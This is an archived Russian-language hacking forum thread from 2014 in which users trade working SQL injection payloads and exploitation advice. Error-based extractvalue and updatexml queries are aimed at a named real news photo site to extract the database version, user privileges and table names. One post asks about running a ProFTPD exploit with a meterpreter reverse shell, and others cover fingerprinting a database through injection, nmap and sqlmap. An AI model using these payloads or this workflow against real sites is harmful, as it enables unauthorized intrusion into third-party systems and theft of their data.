ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2014, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от psihoz26
psihoz26 said:
Помогите раскрутить
Кавычку в начале поставил для вывода ошибки.
Вместо сортировки по столбцам сортируется по словам из сообщений под фото.
Запрос обрезается таким набором символов - %00+--+
Код:
Code:
http://%host%/az/search/?query='1+IN+STRING+MODE%29+order+by+150%00+--+
%host% =photo.trend.az
....
Сообщение от None
query=1'*(extractvalue(1,concat(0x3a,verSion())))* '&x=0&y=0
|
|
|
|
13.03.2014, 18:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
YaBtr где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?
|
|
|
|
13.03.2014, 18:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от psihoz26
psihoz26 said:
YaBtr
где можно почитать про extractvalue?
?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a, file_priv)+from+mySql.uSer))*%20'&x=0&y=0
почему не работает? синтаксис у меня кривой или прав нету?
1. И синтаксис кривой и прав не хватает.
2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html
Там же написано об updatexml.
Сообщение от None
?query=1'*(updatexml(1,concat(0x3a,(Select+table_n ame+from+information_Schema.tableS limit 1)),4))*'&x=0&y=0
|
|
|
|
13.03.2014, 21:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
5283
Репутация:
0
|
|
Юзаю вот этот сплойт proftp_telnet_iac+meterpreter/reverse_tcp. Какой порт нужно прописывать в reverse_tcp(LPORT)? И нужно ли его открывать ?
|
|
|
|
13.03.2014, 23:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Подскажите Парсер сайтов(приват или паблик) зареганных в LIVEINTERNET,TOPMAIL,TOP100RAMBLER,HOTLOG
|
|
|
|
14.03.2014, 00:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
332
Репутация:
0
|
|
SQL движок
Есть несколько скулей типа:
host.com/page.php?id=19' and 1=(select 1) --
движок например точно не mysql - запрос c /*!00000 some_shit */ срабатывает - если бы был мускул, была бы ошибка в синтаксисе - some_shit,
ни Oracle - запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.
если бы была mssql или postgre, то в большинстве случаев сработал бы запрос с Select из таблицы information_schema.tables - host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.
и ещё одна особенность - и ни в одной из скуль не проходит запрос с ORDER BY.
что это может быть за движок?
|
|
|
|
14.03.2014, 00:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от JohnnnDoe
JohnnnDoe said:
Есть несколько скулей типа:
host.com/page.php?id=19' and 1=(select 1) --
движок например точно не
mysql
- запрос /*!00000 some_shit */ не срабатывает,
ни
Oracle
- запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает.
если бы была
mssql
или
postgre
, то в большинстве случаев сработал бы запрос с Select из таблицы
information_schema.tables
- host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает.
и ещё одна особенность - и ни в одной из скуль не проходит запрос с
ORDER BY
.
что это может быть за движок?
Движок или субд? Ссылку в студию\пм, посмотрим на ваш движок и на субд. Причин для невыполнения упомнутых запросов может быть масса, и большая часть не относится непосредственно к самой субд.
|
|
|
|
14.03.2014, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
332
Репутация:
0
|
|
madhatter, СУБД.
сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?
Ещё очень характерная особенность!
срабатывает такой запрос:
[COLOR="Green"]host.com/page.php?id=19' and 1
|
|
|
|
14.03.2014, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
[QUOTE="JohnnnDoe"]
JohnnnDoe said:
madhatter
, СУБД.
сайт находится в локалке, так что от ссылки, к сожалению, не будет толку.
Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение?
Ещё очень характерная особенность!
срабатывает такой запрос:
[COLOR="Green"]host.com/page.php?id=19' and 1
|
|
|
|
14.03.2014, 01:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
332
Репутация:
0
|
|
Сообщение от None
Целевой хост по портам сканировали? select version() делали? Часто субд выбирают вместе с операционкой. Ос на цели какая?
nmap определил как Linux. Но это ни о чём не говорит - скрипт на целевом хосте может легко коннектится к БД на другом сервере. Скрипты платные. PHP, Apache.
Спасибо за подсказку про sqlmap.
Но, судя по всему, это какая-то специфичная/малораспространённая в веб-проектах СУБД.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
